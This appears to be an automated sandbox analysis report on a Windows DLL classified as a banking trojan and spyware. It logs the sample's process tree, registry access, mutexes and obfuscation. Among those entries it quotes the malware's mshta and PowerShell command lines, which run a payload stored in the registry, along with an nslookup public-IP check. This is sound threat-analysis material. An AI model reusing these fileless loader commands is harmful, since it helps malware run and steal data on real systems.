Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E64DC	35_2_00000284AA6E64DC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6EC8A8	35_2_00000284AA6EC8A8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E909C	35_2_00000284AA6E909C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D3498	35_2_00000284AA6D3498
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E096B	35_2_00000284AA6E096B
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F117C	35_2_00000284AA6F117C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F654C	35_2_00000284AA6F654C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D8D2C	35_2_00000284AA6D8D2C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E051C	35_2_00000284AA6E051C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6DFDD8	35_2_00000284AA6DFDD8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F31A4	35_2_00000284AA6F31A4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6DA1A0	35_2_00000284AA6DA1A0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E4670	35_2_00000284AA6E4670
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D964C	35_2_00000284AA6D964C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E2648	35_2_00000284AA6E2648
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F7228	35_2_00000284AA6F7228
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6EC224	35_2_00000284AA6EC224
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E0EC4	35_2_00000284AA6E0EC4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F7EDC	35_2_00000284AA6F7EDC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D7ED8	35_2_00000284AA6D7ED8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6DA6A4	35_2_00000284AA6DA6A4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6DB2A4	35_2_00000284AA6DB2A4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F5A88	35_2_00000284AA6F5A88
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D4AA0	35_2_00000284AA6D4AA0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E3A9C	35_2_00000284AA6E3A9C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D6380	35_2_00000284AA6D6380
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6D5B40	35_2_00000284AA6D5B40
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6E67C8	35_2_00000284AA6E67C8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F6BDC	35_2_00000284AA6F6BDC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6EF7D4	35_2_00000284AA6EF7D4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_00000284AA6F4FA8	35_2_00000284AA6F4FA8

One or more processes crash

Source: unknown

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6536 -s 652

PE / OLE file has an invalid certificate

Source: https___purefile24.top_4352wedfoifom.dll

Static PE information: invalid certificate

PE file contains strange resources

Source: https___purefile24.top_4352wedfoifom.dll

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

PE file does not import any functions

Source: xxfxarla.dll.28.dr	Static PE information: No import functions for PE file found
Source: 5ycfw01g.dll.26.dr	Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: ext-ms-win-xblauth-console-l1.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: ext-ms-win-xblauth-console-l1.dll

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winDLL@47/62@3/2

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0267A648 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

0_2_0267A648

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8E9E2BBA-2F7E-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3C647D8B-6BF2-CEE4-D530-CFE2D9647336}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{347FEBA0-0321-86D2-2DA8-E71AB15C0BEE}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{30798985-CF3A-E269-D964-73361DD857CA}
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{0C917B27-FB18-1E3A-E500-5F32E9340386}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6536

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF479DF3B05A4A00F7.TMP

Jump to behavior

Source: https___purefile24.top_4352wedfoifom.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: https___purefile24.top_4352wedfoifom.dll

ReversingLabs: Detection: 14%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\https___purefile24.top_4352wedfoifom.dll'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6740 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17420 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:82960 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6536 -s 652
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\7849.bi1'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6740 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17420 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:82960 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\7849.bi1'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: https___purefile24.top_4352wedfoifom.dll	Static PE information: More than 200 imports for KERNEL32.dll
Source: https___purefile24.top_4352wedfoifom.dll	Static PE information: More than 200 imports for USER32.dll

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.pdb source: powershell.exe, 00000018.00000002.885294750.000001D7AFBF4000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 0000001E.00000003.880827092.000000000E420000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000020.00000002.858769696.000001A77A0DC000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.pdbXP source: powershell.exe, 00000018.00000002.885632713.000001D7AFC61000.00000004.00000001.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.812525782.0000021F71900000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.822200708.00000205DC350000.00000002.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.pdb source: powershell.exe, 00000018.00000002.885294750.000001D7AFBF4000.00000004.00000001.sdmp
Source:	Binary string: sxs.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source:	Binary string: \xa.pdb source: powershell.exe, 00000018.00000002.858473846.000001D7ABD53000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: CLBCatQ.pdb0t source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001E.00000000.840185909.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 0000001E.00000003.880827092.000000000E420000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.839861744.0000000003F10000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001E.00000000.840185909.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdbltH5r source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb:t source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.839861744.0000000003F10000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb(t source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000020.00000002.858769696.000001A77A0DC000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbk source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.pdbXP source: powershell.exe, 00000018.00000002.885294750.000001D7AFBF4000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdbk source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb@tl5 source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb\tx5` source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp

Data Obfuscation:

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))			Jump to behavior

Compiles C# or VB.Net code

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'	Jump to behavior

PE file contains sections with non-standard names

Source: https___purefile24.top_4352wedfoifom.dll	Static PE information: section name: .data3
Source: https___purefile24.top_4352wedfoifom.dll	Static PE information: section name: .data2
Source: https___purefile24.top_4352wedfoifom.dll	Static PE information: section name: .data5
Source: https___purefile24.top_4352wedfoifom.dll	Static PE information: section name: .data4

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011121B3 push ecx; ret	0_2_011121C3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01112160 push ecx; ret	0_2_01112169
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10004611 push esp; retf	0_2_10004616
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001E53 push 761D85F0h; iretd	0_2_10001E58
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10006C54 push eax; retf	0_2_10006C61
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003666 push ecx; ret	0_2_10003667
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1007F070 push ecx; ret	0_2_1007F0AB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001277 push cs; ret	0_2_10001278
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10009AAC push ds; iretd	0_2_10009AAD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000397F push ecx; ret	0_2_100039FA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000858B push edx; iretd	0_2_10008591
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10004197 push ebp; retf	0_2_10004199
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100075A8 push edx; iretd	0_2_100075AB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100095BD push ebx; iretd	0_2_100095BE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100039E3 push ecx; ret	0_2_100039FA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002FE6 push eax; retf	0_2_100030A4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1007EFE0 push edx; ret	0_2_1007F041
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0267ACE0 push ecx; ret	0_2_0267ACE9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0267B09B push ecx; ret	0_2_0267B0AB

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.dll			Jump to dropped file
